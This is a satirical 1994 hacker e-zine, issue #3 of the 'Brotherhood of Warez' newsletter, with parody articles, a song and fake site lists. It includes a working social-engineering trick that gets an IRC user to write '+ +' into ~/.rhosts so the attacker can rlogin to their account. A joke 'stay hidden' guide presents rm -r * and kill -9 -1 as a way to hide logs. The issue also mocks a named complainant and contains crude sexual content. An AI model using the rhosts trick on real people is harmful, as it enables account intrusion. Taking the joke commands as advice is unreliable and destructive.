_______________________________________________________________________________ -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= : March 1994 - * ____ \ / \|/ BRoTHeRHooD oF WaReZ : : / | \ __* __ || +-------* BRoTHeRHooD oF WaReZ : : The Brotherhood | o / ___| \ / | -++- \__/> / BRoTHeRHooD oF WaReZ : : Speaks Once | \/ \ | | | -++- __ < ( BRoTHeRHooD oF WaReZ : : Again. Phear. | o ) o | .o / || | \_\ \ BRoTHeRHooD oF WaReZ : : |___/\___/ \/\/ |______| BRoTHeRHooD oF WaReZ : -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= _______________________________________________________________________________ KRAD WAREZ KRAD WAREZ KRAD WAREZ KRAD WAREZ KRAD WAREZ KRAD WAREZ KRAD WAREZ KR AD WAREZ KRAD WAREZ KRAD WAREZ KRAD WAREZ KRAD WAREZ KRAD WAREZ KRAD WAREZ KRAD WAREZ KRAD WAREZ KRAD WAREZ KRAD WAREZ KRAD WAREZ KRAD WAREZ KRAD WAREZ KRAD WA REZ KRAD WAREZ KRAD WAREZ KRAD WAREZ KRAD WAREZ KRAD WAREZ KRAD WAREZ KRAD WARE Z KRAD WAREZ KRAD WAREZ KRAD WAREZ KRAD WAREZ KRAD WAREZ KRAD WAREZ KRAD WAREZ KRAD WAREZ KRAD WAREZ KRAD WAREZ KRAD WAREZ KRAD WAREZ KRAD WAREZ KRAD WAREZ KR AD WAREZ KRAD WAREZ KRAD WAREZ KRAD WAREZ KRAD WAREZ KRAD WAREZ KRAD WAREZ KRAD WAREZ KRAD WAREZ KRAD WAREZ KRAD WAREZ KRAD WAREZ KRAD WAREZ KRAD WAREZ KRAD WA REZ KRAD WAREZ KRAD+--------------------------------------+KRAD WAREZ KRAD WARE Z KRAD WAREZ KRAD W| In this exciting issue of the BoW |AD WAREZ KRAD WAREZ KRAD WAREZ KRAD WAR| newsletter we bring you: | WAREZ KRAD WAREZ KR AD WAREZ KRAD WAREZ| |AREZ KRAD WAREZ KRAD WAREZ KRAD WAREZ KR| 1) Intro to BoW newsletter #3 |Z KRAD WAREZ KRAD WA REZ KRAD WAREZ KRAD| 2) .rhosts security hole exposed |KRAD WAREZ KRAD WARE Z KRAD WAREZ KRAD W| 3) 0-Day news |AD WAREZ KRAD WAREZ KRAD WAREZ KRAD WAR| 4) How to Narq Effectively | WAREZ KRAD WAREZ KR AD WAREZ KRAD WAREZ| 5) Keeping a low profile on UNIX |AREZ KRAD WAREZ KRAD WAREZ KRAD WAREZ KR| 6) WaReZ Acronyms In 5 Easy Weeks |Z KRAD WAREZ KRAD WA REZ KRAD WAREZ KRAD| 7) How to become a famous H/P d00d |KRAD WAREZ KRAD WARE Z KRAD WAREZ KRAD W| 8) A Song |AD WAREZ KRAD WAREZ KRAD WAREZ KRAD WAR| 9) The Official BoW SiTE List | WAREZ KRAD WAREZ KR D WAREZ KRAD WAREZ +--------------------------------------+REZ KRAD WAREZ KRAD WAREZ KRAD WAREZ KRAD WAREZ KRAD WAREZ KRAD WAREZ KRAD WAREZ KRAD WAREZ KRAD WA REZ KRAD WAREZ KRAD WAREZ KRAD WAREZ KRAD WAREZ KRAD WAREZ KRAD WAREZ KRAD WARE Z KRAD WAREZ KRAD WAREZ KRAD WAREZ KRAD WAREZ KRAD WAREZ KRAD WAREZ KRAD WAREZ KRAD WAREZ KRAD WAREZ KRAD WAREZ KRAD WAREZ KRAD WAREZ KRAD WAREZ KRAD WAREZ KR AD WAREZ KRAD WAREZ KRAD WAREZ KRAD WAREZ KRAD WAREZ KRAD WAREZ KRAD WAREZ KRAD WAREZ KRAD WAREZ KRAD WAREZ KRAD WAREZ KRAD WAREZ KRAD WAREZ KRAD WAREZ KRAD WA REZ KRAD WAREZ KRAD WAREZ KRAD WAREZ KRAD WAREZ KRAD WAREZ KRAD WAREZ KRAD WARE Z KRAD WAREZ KRAD WAREZ KRAD WAREZ KRAD WAREZ KRAD WAREZ KRAD WAREZ KRAD WAREZ _______________________________________________________________________________ 1111111111111111111111111111111111111111111111111111111111111111111111111111111 _______________________________________________________________________________ Introduction to BoW newsletter number 3 --------------------------------------- Well, there's been alot of big things going on since BoW #2 was released. Our phearless leader had some trouble with some artificial stimulants, and The Yorkshire Posse seem to have been causing some trouble, but on a brighter note, four Auxiliary Members have moved up to Eleet Member status. A full warm welcome to The Velkr0 K0d3 \/\/ARRi0R, Hackle-b33ry phin, The Phresh Prince of Belcore, and The Cyberspace Warrior. You will notice that their articles are predominant in this issue. You will notice that there are some real articals in this issue, the last two were just sorta organizational, but now things are starting to get rolling.. I'm really pleased with our artical exposing the .rhosts vulnerability, it's about time that got out.. maybe it will get patched some time soon... and I'm sure that everyone will agree that Hackle-b3rry phins artical on keeping out of sight on UNIX systems will be greatly appreciated.. and I can't say how much the acronym list will help me out in the future.. I always fuck up on those.. not anymore however... Anyway, that's about all I have to say for now... remeber, BoW is watching you. Our Application VMB is still alive and kicking, drop us a line at 416-339-1700 if you wish to join up with us. We are the future. Assimilate, all else if futile. Member List: Founder, president, dictator for life and phearless leader: U4EA Newsletter editors: remj,pluvius Eleet Members: Lister [HAGGIS prez] Mystic Ruler [HAGGIS/OMR prez], Maelstrom, Vito, Freff, Nuclear Phusion, Panther Modern, Enigma, Carsenio, Doctor Dave, Kilslug, Mad Dog, The Vekr0 K0d3 \/\/ARRi0R, Hackle-b3rry phin, TH3 PHR3SH PR1NC3 0F B3LLC0RE and The Cyberspace Warrior. Honourary Members: Cliff Stole (my k0d3z), Eugene Spafford Auxiliary Members: Danny Diveter, Three-way Jay, Info-mail Ivan, Centagram Sam, *67-Kevin, Aspen Extreme, Call-return Vern, The 300 baud bandit, *70-Hero Telephone Tony, Voice-mail Haqer, PBX-Pat, Speaker fone Jone, Trever Trunk, Line Man Stan, Call Display Faye, Kordless Karl, Dial Tone Don, Pirate Pete, The Code Slayer, Conference Call Paul, Blue Box Bart, The Call Block Jock, The MCi Sprinter, Datapac Jack, The Delphi Guy, Compuserve Connie Well, thats about it for now.. enjoy the newsletter... look for another in a month or so.. TH1NGZ T0 WATCH F0R IN UPC0M1NG 1SSU3Z: (-) TH3 0FF1C1AL V1S10NARY .M0D !!! (-) M0R3 BuG R3P0RTZ !!! (-) PHR3SH W4R3Z R3V13W -*- LEMONADE STAND -*- !!! (-) 0FF1C1AL [BoW] WaLL P()ZT3R !!! (-) DNR B0X PLANS + MUCH, MUCH, M0RE !!! TH1NGZ Y00 CAN S3ND UZ T() SH0W Y0UR APPR3C1AT10N: (-) .GIFs 0F Y0UR G1RL13Z (-) W4R3Z AND k0d3z $&(*)#&*)$!!!!! (-) Y0UR INPH() (-) 1F Y00 ARE PH3MAL3, S3ND US Y0UR SOPP1NG W3T PANT13Z !!! - The Cyberspace Warrior _______________________________________________________________________________ 2222222222222222222222222222222222222222222222222222222222222222222222222222222 _______________________________________________________________________________ .rhosts security hole exposed ----------------------------- HOLY SH1T!! SYS4DMINZ PH3AR HAQRZ PH0R TH3Y HAV3 F0UND A N3W WAY T0 Ga1N AXS T0 Y0UR SYST3M!! TH1S 1S AN 0FF1C1AL BoW EXCLUS1V3!! W3 WENT UNDERCOVER TO 3XPOSE HAQRZ ON IRC US1NG TH1S HOL3 TO SN3AK INTO L0TZA S1T3Z!!! H3R3 IS S0M3 F00TAG3: Log File Started on Mar 7, 1994 $ irc /join #warez Cannot join channel #warez: Banned From Channel << Sh1t, bann3d.. /join #hack << Lets see if the haqrz know about .rhosts TOPIC FOR #hack: WE BLOW FOR SCRIPTZ. << Neato Topic U4eA (U4EA@BOW.ORG) has joined channel #hack. > y0y0y0y0 eYe n33d th3 scr1pt f0r .rhosts!!! You have been kicked off channel #hack by chasin (GET OUT LAMER!) ^^^^^^ note the sense of hostility. [BoW] will g3t chas1n f0r th1s! /load n00k /n00k chasin << eYe h0p3 1t w0rkz (hehehehe) NUKED. /whois chasin CHASIN: NO SUCH NICK OR CHANNEL << 1t w0rk3d (bahaha) *chasin* im mailing your sysadmin loser!! << m0r3 fan ma1l 3l33+ /nick chas1n U4EA is now known as chas1n. Signon by visionary detected. << 3l33+ TRAXST3R!!! /msg visionary N4RQ!!! *visionary* yo, im not narc, can we talk about this? << DEJA VU? Visionary invites you to #speechcard. /join #speechcard TOPIC FOR #speechcard: /MSG VISIONARY FOR THE LATEST SPEECHWARE CRACK! chas1n (U4EA@BOW.ORG) has joined channel #speechcard. > y0y0y0y0y0 whatz up N4RQZ??? whats up with this u4ea? anyone got his info? .msg visionary call the narqline, I just left an update on u4ea in there.. ^^^^^^ W3 MUST 1NF1LTR4T3 TH1S VMB!!! chas1n = u4ea << f01l3d aga1n by tymnet jan1t0r any1 know who this rhakim loser is who keeps msging me? ddr3w: I'll trad3 y0u 0�day 4 s0m3 nUa'z!! *chasin* stop imitating me or I will use my sendmail script on you!!! Then you will be sorry!! /msg chasin [BoW] will get you n1g. /n00k chasin NUKED. /whois chasin CHASIN: NO SUCH NICK OR CHANNEL << Bahahahahha eYe g0t h1m! /nick chasin chas1n is now known as chasin. > 3l33+ chasin = u4ea << f01l3d aga1n by tym3n3t jan1t0r.. Stoll invites you to #bugz << 3l33+, now we have f00l3d th3m!! /join #bugz chasin has left #speechcard TOPIC FOR #bugz: SPAFF FOR PREZ chasin (U4EA@BOW.ORG) has joined #bugz chasin ^*($#@(*$&(*#@&$*(#@&$(*@!!!!! mode change #bugs +ooo chasin chasin chasin by Thackory. > y0y0y0y0 eYe n33d th3 scr1pt f0r .rhosts, any1 g0t it 0nl1n3.? *pluvius* STOP MAKING PASSES AT MY WOMAN YOU LOD LAMER)$#@*()$*@# /msg pluvius Its me u4ea, im doing some undercover [BoW] w0rk. *pluvius* hehee sorry dude.. << PLUVIUS l0v3s LYDIA TSK TSK.. stoll has been kicked off channel #bugz by Pengo (N4RQ!!!) DCC SEND REQUEST (rhosts.txt) FROM bUgd00d. /dcc get bUgd00d <<< 3l33+ W3 n0w HAV3 th3 INPH0!!!!! 1f th1s w3r3 t0 fall 1nt0 th3 wr0ng handz 1t c0uld b3 v3ry dang3r0us!! /signoff f00l3d y0u!!!! $ $ ls rhosts.txt $ cat rhosts.txt #DONT LET THE HAQRZ GET THIS ONE, COULD BE VERY DANGEROUS #HERE IS HOW IT WORKZ: GOTO IRC... CHANGE YOUR NICK TO SOME DUMB BLONDE SOUNDING NAME, THEN FIND AN UNSUSPECTING VICTIM AT THE TARGET SITE. MESSAGE THEM THAT YOU ARE TRYING TO FIGURE OUT A COMMAND, BUT IT DOES NOT SEEM TO WORK. AND ASK THEM TO TRY IT TO SEE IF IT DOES ANYTHING FOR THEM. ASK THEM TO SEE WHAT OUTPUT THEY GET FROM: /EXEC echo "+ +" > ~/.rhosts WHEN THEY SAY THAT NOTHING HAPPENED, SAY THANKYOU, AND EXIT IRC. NOW RLOGIN INTO THEIR ACCOUNT, AND YOU HAVE EXPLOITED THE .rhosts VULNERABILITY. # MAKE SURE THIS DOESN'T GET INTO THE WRONG HANDS, THE INTERNET WOULD # CRUMBLE IF HAQRZ GOT THEIR HANDS ON THIS ONE. $ << hmm, will have to try this out. $ irc /nick bambi /who *victim.com* #bolo _RED_ I am stupid stupid@victim.com END OF WHOIS LIST. /join #bolo TOPIC FOR #bolo: We are stupid bambi (U4EA@BOW.ORG) has joined #bugz /msg _RED_ Hi, how are you? *_RED_* I'm fine, and yourself? /msg _RED_ well, I'm having some problems with IRC... *_RED_* Really? Maybe I can help you out.. what is the problem /msg _RED_ well.. no.. i feel silly.. I'll try and figure it out *_RED_* No, seriously, I don't mind.. ask away /msg _RED_ well, I am trying to run this command, but it doesn't seem to work properly.. maybe you can try it out for me? *_RED_* Sure! What is the command? /msg _RED_ /exec echo "+ +" > ~/.rhosts /msg _RED_ but it doesn't seem to do anything! :( *_RED_* Hold on, I'll try it out.. *_RED_* Hmmm.. you seem to be right... wierd.. /msg _RED_ ahh well.. I guess I'll just have to go without.. thanks for your help! *_RED_* No problem.. hey, where are you from? /signoff gotta go... bye! $ rlogin victim.com -l stupid Welcome to victim.com, specializing in example security vulnerabilities! $ hostname victim << n3at0! W3 R 1n!!!#)@& $ whoami stupid << elite! We have exploited the .rhosts weakness. $ Log File Ended on Mar 7, 1994 _______________________________________________________________________________ 3333333333333333333333333333333333333333333333333333333333333333333333333333333 _______________________________________________________________________________ *-*-*-*-*-*-*-* Z3R0-DAY GNU'Z *-*-*-*-*-*-*-* R3C3NTLY WH1L3 CLUBB1NG, OUR PH3ARL3ZZ L3AD3R C0LLAPS3D AND WAZ RUSH3D T0 TH3 H0SP1TAL WH3R3 H3 WAZ TR3AT3D FOR ACUT3 DRUG INT0X1CAT10N. 1N ACC0RDANC3 WITH TH1S N3AR D3ATH XPER13NC3, HE HAS F0RM3D AN 1NN3R 0RD3R 0F [BoW]: kULT 0F d3ATH eXp3R13nC3'z (K0D3Z) H1GH PR13ST AND G0DL1K3 D31TY: U4EA T0K3N N1GZ: REMJ, PLUVIUS TH3 F0LL0W1NG IS TH3 FIRST INITIATION RIT3 0F TH3 ES0T3RIC ORD3R 0F K0D3Z: - find a secluded area suitable for extended periods of uninterrupted meditation and reflection. - remove all articles of clothing and jewellry. - lay down on your back with your hands folded on your stomach. - clear all thoughts from your mind, concentrate on becoming one with all things, allow thoughts to drift away lazily like clouds. Be an impassionate observer to all this. - close your eyes when you feel yourself starting to relax. - With a slow rhythm repeat the mantra: "OLD WAREZ ARE NO WAREZ" Allow the mantra to pick up speed on its own and focus on nothing but this mantra. - this excercise should only take 1 hour maximum. -|- VOICE MA1L HAQR [k0d3Z Initiate] _______________________________________________________________________________ 4444444444444444444444444444444444444444444444444444444444444444444444444444444 _______________________________________________________________________________ ######################## -|- H()W TO N4RQ EFF3CTIV3LY -|- ######################## y0y0y0, W3lc0m3 t0 y3t an0th3r [BoW] ins1d3 Exclus1v3, our ph0cus th1s m0nth 1s "H()W TO N4RQ EFF3CTIV3lY". We exam1ne a class1c cas3 in which rand0m narqing is applied, happily this art1cl3 c0m3z dUring [BoW]'z "HUG A N4RQ W33K" so w3 w1ll als0 b3 s3l3ct1ng th3 w1nn3r of the "TRAXTER N4RQ AWARD". AR3 Y00 EXCITED?????? WE ARE!!! Let's examine a l3tt3r our phearless leader received in which he is unjustly accused of b3ing a HAQR!!! Shall we: * NOTE: (This letter has not been altered in any way, shape or form, only a bbs # has been changed as it is not relevant for our purposes.) From root Wed Dec 8 03:43:06 1993 Forwarded message: > From grayarea@netaxs.com Tue Dec 7 06:15:23 1993 > > This is to confirm our voice call earlier today. I am Netta Gilboa, Presi > dent of Gray Areas, inc. and Publisher of Gray Areas magazine. Early this > morning (between 1:45-2 am) I had a problem with one of your users. It i > s possible this person is using an unauthorized acct and it is possible t > hey have root on your ssytem. > This person was in IRC and used the login of RiSC2@chinook.halcyon.com > He used my nickname "grayarea" as the person who owned the account. I hav > e a log of this entire episode. Approxiamtely 15 minutes before he used y > our system to flood me with a script that made my computer beep and locke > d up my screen with the message "lamer" thousands of times until my morem > dropped carrier on three occassions and reconnected, i had a problem wit > h another user. It is my suspicion this is his work although I cannot pro > ve it. The "suspected" user is u4ea@acadvm1.uottawa.ca He runs a BBS in > Canada and this number is unlisted so I cannot trace it further wi > thout a court order. Should it prove useful, trhe BBS number is 911-911-9 > 111. In the past week this u4ea person has banned me off irc four times a > nd has caused nick collisions by taking my nickname while i was suing it. > oops, using not suing. He has been warned that I own a magazine and a cor > poration and says he does not care. Please be advised that my nickname is > registered with IRC's Nickserv and the name "Gray Areas" is a fereal tr > ademark owned by my corporation. > I would appreciate any end you can put to this account, user or any inf > ormation on his real data so my lawyer can take it up with him. ^^^^^^^^^ * Note the usage of the classic: "y0, You g0t h1s INPH()?" ploy. This is a favourite amongst the hard c0re narqz, we are obviously d3al1ing w1th a pr0 h3r3.. This narq l3tt3r runs rath3r sm00thly, I like the usage of th3 class1c narq diction and gains triple w0rd sc0res by the 1nclusion of th3 f0ll0w1ng w0rdz: unathorized, trace, lawyer, court-order, suspiscion, log Alth0ugh th1s N4RQ letter l0s3s its effectiveness in its unb1ased deviation from any relevant or true facts, it st1ll manag3s to ma1nta1n its sense of rhythm and serves as a br1ll1ant exaMpl3 f0r our r3ad3rsh1p t0 enj0y.. We had some experts examine this document and heres what they had to say: "Two Thumbs Up !!!!!" - Siskel And Ebert T0 k1ck 0ff "HUG A N4RQ WEEK" we hereby award the TRAXTER N4RQ AWARD to GRAYAREA.. CONGRATULATIONS !!!!! -=- V3lcr0 /<0d3 Warr10r -=- _______________________________________________________________________________ 5555555555555555555555555555555555555555555555555555555555555555555555555555555 _______________________________________________________________________________ Keeping a low profile on UNIX systems ------------------------------------- Well, UNIX systems are everywhere, and using a UNIX system, you can usually get access to internet (if you are elite enough to know the NUP), and on internet you can get free warez.. that's right, no ratios, and you don't need to abuse codes! This informative little log is provided to help you keep a low profile on UNIX systems, so that you may keep them for a long time of happy couriering. Notes are provided at the end of the log file, and numbering appears on the right hand column to reference the notes with. -=> * Hackle-b3rry phin * <=- -------------------- ATDT*67,911-9119 1 CONNECT 57600/V666SATAN 2 --- Welcome to NSA-NET. The National Security Agency's Data Network 3 You have accessed dial-in port #31337. This programs and data on this system are confidential, and may be accessed only by athorized personal. All usage is subject to monitoring, logging, ANI, traceback, and line voltage locks. If you are not an authorized user, then do not attempt to login! NSA-NET> telnet keepout.nsa.gov Translating "keepout.nsa.gov"...name server ( [OK] Trying KEEPOUT.NSA.GOV ( Open SunOS keepout 4.3.1 1 sun4m (ttys0) login: HaQR Password: elitewarez 4 Mar. 07, 1994. 5 Due to unusual activity on the subnet in the last few days, all dial-up logins will be line locked and traced. You will receive a phone call on your voice line within 15 seconds of connecting. All logins will be logged and fully monitored. Have a nice day. `unknown' terminal type is not supported. TERM = (300h) vt100 Erase is Backspace Kill is Ctrl-U keepout-1> who 6 root console Mar 7 20:07 root ttyp0 Mar 7 20:10 security ttyp1 Mar 7 19:54 narq ttyp2 Mar 7 19:37 HaQR ttys0 Mar 7 20:42 keepout-2> w 7 8:42pm up 15:21, 3 users, load average: 0.39, 0.12, 0.06 User tty login@ idle JCPU PCPU what root console 8:07pm -csh root ttyp0 8:10pm 5:40 5:40 top 54x64+1125+286 -rv security ttyp1 7:54pm 2:15 2:15 linetrace -port ttys0 narq ttyp2 7:37pm 24 24 inform -u HaQR -p ttys0 HaQR ttys0 8:42pm 5 5 w keepout-3> ps 8 PID TTY TIME COMMAND 17206 ttys0 0:00 ps 15389 ttys0 0:00 telnetd 15390 ttys0 0:05 csh keepout-4> ls 9 trsiwrz1.zip trsiwrz3.zip BoW1.txt irc* xdcc.irc trsiwrz2.zip trsiwrz4.zip BoW2.txt 0-day/ 1-day/ keepout-5> su 10 Password: root su: Sorry keepout-6> su Password: elite su: Sorry keepout-7> su Password: warez su: Sorry keepout-8> su Password: r00t su: Sorry keepout-9> su Password: rewt su: Sorry keepout-10> su Password: krad su: Sorry keepout-11> su Password: 0day su: Sorry keepout-12> su Password: kradwarez # cd / # rm -r * 11 # kill -9 -1 12 [Connection to KEEPOUT.NSA.GOV closed by foreign host] NSA-NET>hangup 13 NO CARRIER RING 14 RING RING RING RING RING RING ----------------------------- NOTES: 1 - Cover your tracks.. always use call blocking.. they have this dude who sits there and when they think hackers are hacking their system, he writes down all the numbers that pop up on the caller-id display. Don't forget to *67!!! 2 - Find the elite high speed dial-ups so that you can transfer your warez as fast as possible. 3 - Ignore the boring warnings.. they're there to keep the lamers out. 4 - Always create cool user id's for yourself.. you will get alot more repect on IRC. 5 - Once again, ignore the boring warnings, they are to keep the lamers out. 6 - Keep a keen eye on who is logged in, tonight looks fine.. 7 - On the odd chance that users are logged in, keep an eye on what they are doing... looks harmless enough on here.. 8 - ps is a great tool.. and the output looks so neato.. use it lots, that way if girls are watching they will think you know what you are doing. 9 - ls is like the dir command in dos.. it shows your files.. don't worry about hiding them, because you've created your own account, so other people won't be able to get at your warez. 10 - Now hack root.. the fastest and cleanest way is brute forcing.. note the above log took a lot longer than it usually does.. you just guess the right password 11 - Hide all logs with this command. Note you have to be root and be in the '/' directory. 12 - Just incase, kill off your processes with this command. 13 - Ok, we've had our fun for tonight.. hangup, and call back in a few hours for some more fun. 14 - It's probably nothing.. just ignore it, they will go away. _______________________________________________________________________________ 6666666666666666666666666666666666666666666666666666666666666666666666666666666 _______________________________________________________________________________ Y()Y0yOyo. U 3V3R KaLL UP aN ELEET 0 DAY B0R3D 2 GeT SUM m0R3 0-DaY WaREZz & G3+ STUK 0N ALL Th()Ze AKR0NiMZ 1N TH3 GNU LUSER KWESTIONAIR? w3LL, 1N TH1S 1SSu3 BoW BRiNGz U.......... 0 0 0 0 0 0 O O O O O O o o o o o o o . . . . . . (i bet you're getting excited now aren't you?) . . . . . . . . . . . . . . . . . . . . . . . . DA BoW ELEET 0-DAY WHEREIS AKR0NiM LiZT!#$$!($&*($@$@*$@&@#$$@#&#$&* BIE: TH3 V3LKR0 K0D3 \/\/4RRiOR! HeR3Z We G0EZ: ACiD: ACID CHEWING IDIOT DRUGGIES (warez beta testers, play warez all day) BoW: BROTHERHOOD OF WAREZ (the coolest warez group there is) iCE: I C EVERYTHING (a undercover nark group that bust warez d00dz - watch out) FLT: FAST AS LIGHTENING TRANSFERZ (a couriering group) GFWN: GiMM3 FUQiN WaReZz N0W! (a couriering group) PiC: PI I CRACKED (a cracking group) PiL: PIRATES IN LOVE (another cracking group) PTG: PRETTY TOUGH GUYZ (another undercover nark group) PWA: PANTY WETTING ASSOCIATION (help out warez d00dz who get busted) RiSC: REALLY IDIOTIC STUPID CRACKERZ (cracking group) RZR: RED ZEBRA RACERS (couriering group) SPA: S00PAH PIRATE ASSOCIATION (cracking group) SWaT: SILLY WANKS AND TRADERS (couriering group) TDT: TOTALY DUMB TRAINERS (they write cheats and trainers) THG: THE HATED GUYS (the cops, ie: ppl who bust you favorite 0 day PI board) TRSI: TEN RASTA'S SELLING ICE (drug dealers who provide for couriering groups so they can stay awake for those all night warez transfers) TuC: THE UGLY CREW (an ansi group) (SPECIAL SECKTION 4 AYCH-PEE WaREZ B0ReDS (s0 U CaN G3Tz D4 K0d3Z TO KaLLZ Da 0-DaY B0ReDz) ANI: ANTI-NARQ-ISOLATER (it's a narc detector box you can build) CBI: CODE ABUSERS INTERNATIONAL (group that provide codes to courier groups) DMS: DATA MUTE SWITCH (a box to add a hold button to your phone) DNR: DIAL NUMBERZ RAPIDLY (a special box you can make which dials codes too fast for the fone company to notice, call up your fone company and ask to have it installed on your line) ESS: ELECTRONIC SILENCER SYSTEM (a box you can build to mute your line) ISDN: I SEE 'DA NUMBER! (phrase used by people who have caller id) LoD: LOTZ 'O DoNuTZ (trashing group) NUA: NEW USER APPLICATION (those things that these acronyms are on) PAD: PRESS A DiGGiT (voice mail system hacking group) PBX: PIRATE LABS EXCHANGE (the first ever H/P and WaReZ board) POTS: PRIVATE OFFICE TELEPHONE SWITCH (this is the newest eletronic switching system there is) TNo: TOUCH-TONE NUMBERS OVERDOSE (condition acquired from abusing 2 many k0d3z) VMB: VALiDAT3 ME BiTCH! (phrase used by hackers to social engineer their way into unix systems) y0y0y0 HaV3 FuN D0WNL0AD1NG THe 0-DaY. - V3lkr0 _______________________________________________________________________________ 7777777777777777777777777777777777777777777777777777777777777777777777777777777 _______________________________________________________________________________ -=-=-=-=-=-=-=- -=- PHR3SH W4R3Z -=- H0w T0 b3 a PhAm0uZ AyCh-P33 d00d. -=-=-=-=-=-=-=- y0y0y0y0!!! th1s art1cl3 1s an 1n d3pth r3p0rt 0n h0w t0 b3 ph3ar3d and r3sp3ct3d 1n th3 H/P (Aych-p33) sc3n3. N0w th3r3 ar3 s3v3ral waYz but th3 3az13st and qu1ck3st way 1s t0 wr1t3 s0m3 s0rt 0f d3v1ant s0ftwar3, s0 th1s 1s whAt w3 w1ll h3lp y0u d00. StEp ()ne: Call Up aN H/P b33 b33 3ss aNd mak3 an acc0unt 4 y0urs3lf, 1f y0u g3t stUck 0n anY 0f th0s3 GNU LUS3r Apps r3f3r t0 th3 0ff1c1al [BoW] AKR()NyM l1st included in th1s 1ssu3... StEp Tw0: D0wnl0ad ToneLoC.ZIP, anY v3rs10n w1ll suff1c3 f0r our purpos3s. StEp 3: UnZiP 1t 0nt0 y0ur HaRd-Dr1v3 StEp f0r: 3diT all th3 txt f1l3z and r3plac3 all r3f3r3nc3s to MiNoR ThReAt w1th y0ur nam3!!! StEp 5: n0w aDD 5 t0 th3 v3rz10n # y0u hav3.. EX: Toneloc Beta 0.99 b3c0m3z 1.04 StEp SiX: N0w, th1s st3p 1s 0pt10nal bUt r3c0mm3nd3d Includ3 a k-RaD FoUnD.LoG f1l3 w1th th3 f0ll0w1ng 3ntr13z add3d: Eleet PBX (WITH NO CODE): 305-943-5488 LUSERF3RZ GNU K()D3L1N3: 1028809-11019 StEp 7: n0w z1p 1t Up and r3nam3 it t0 y0ur n3w 3l33+ r3l3aze.. StEp 8: N0w g0t0 IRC aNd maSs dcc 1t t0 #phreak , #warez1-99 and #hack.. Y00 w1ll ga1n th3 r3sp3ct y0u alwayz want3d bUt n3v3r stay3d 0pp3d l0ng 3n0ugh t0 ga1n 1t!!! HAQRZ w1ll PH3aR Y00, PH0n3-C0mpaN13z w1ll c0w3r 1n PH3ar!!! y0y0y0y0!!! Thatz all th3r3 1z t0 1t.. 0pt10nally th1s t3chniQuE cAn als0 b3 UsEd 0n toolz.irc and anY 0th3r scR1pT y0u f1nd.. f0r m0r3 handy INPH(), qu3st10nz or PHAN MA1L, ma1l m3 0n th3 1nt3rn3t: root@cert.org (D0nt pgp any s3ns1t1v3 INPH(), juSt ma1l 1t n0rmallY...) -+- Th3 PHR3SH PR1NC3 0F B3LLC0RE -+- _______________________________________________________________________________ 8888888888888888888888888888888888888888888888888888888888888888888888888888888 _______________________________________________________________________________ +*+ CODE KILLER +*+ (sung to the tune of Body Count's "Cop Killer") Picked my payphone, Dark and all alone, k0d3 k1dd13, i am unknown, just let me near your fone! Got all my codes with me, got my MCI's and my AT&T's, tonight I'm gonna call for phree, yeah and you can't stop me! 'cause I'm a... CODE KILLER, gonne abuse all night, CODE KILLER, yeah gonna do it right, CODE KILLER, gonna prank 9-1-1, (FUCK 'EM!) CODE KILLER, nothin' left when i am done. Got my brand new beige box, found your junction box, gonna pop the cover off, your bill is gonna knock your socks off! gonna terrorize your line, gonna do it all the time, these codes are all mine, gonna kill 'em one at a time.. (chorus) FUCK THE TELCO! (repeat) FUCK THE TELCO for Kevin Mitnick. FUCK THE TELCO for Kevin Poulsen. FUCK THE TELCO for Karl Koch. FUCK THE TELCO for your freedom. FUCK THE TELCO, sing along. I'm a muthafuckin' CODE KILLER! CODE KILLER! (repeat) _______________________________________________________________________________ 9999999999999999999999999999999999999999999999999999999999999999999999999999999 _______________________________________________________________________________ BoW BoW BoW BoW BoW BoW BoW BoW BoW BoW BoW BoW BoW BoW BoW BoW BoW BoW BoW BoW BoW BoW BoW -==< Official Site List >==- BoW BoW BoW BoW +-----------+---------------------------------------------------------+ BoW BoW | Status | Name Baud Number | BoW BoW | World HQ | WaReZz my WaReZz? 110-300 [905]-PRI-VATE | BoW BoW | Euro HQ | This BBS is for Virus' 4800/MNP4 only! +44-2-ELEET-4U | BoW BoW | USA HQ | The Aych-Pee BBS V666 satan modem [218]-SCAN-4IT | BoW BoW | Can. HQ | WaReZz 'O Plenty 1200 [604]-NOT-4YOU | BoW BoW | Member | NaRQ CeNTRaL 4800 [305]-ASKK-PAT | BoW BoW | Member | ThaReZz Ma' WaReZz 300 [208]-TO0-KRAD | BoW BoW +-----------+---------------------------------------------------------+ BoW BoW BoW BoW W3 R 4ckt1v3l`/ L00k1nG 4 GNu K-RaD M3MBeRZz, 1F U TH1nK U R K-RaD BoW BoW ENuF 4 BoW!, TH3N C4LL R 3l33+ BoW 4PPLiC4TiON VMB -- 416-339-1700 BoW BoW BoW BoW 4Lt3RN4T3Ly, U CaN K4LL 0UR 3l33+ 800 V0iC3 MAiL B0Xx At 800-968-1616, BoW BoW B0X 372, TH4NX 2 VOiC3 MAiL H4QeR 4 TH3 B0X. BoW BoW BoW BoW BoW BoW BoW BoW BoW BoW BoW BoW BoW BoW BoW BoW BoW BoW BoW BoW BoW BoW BoW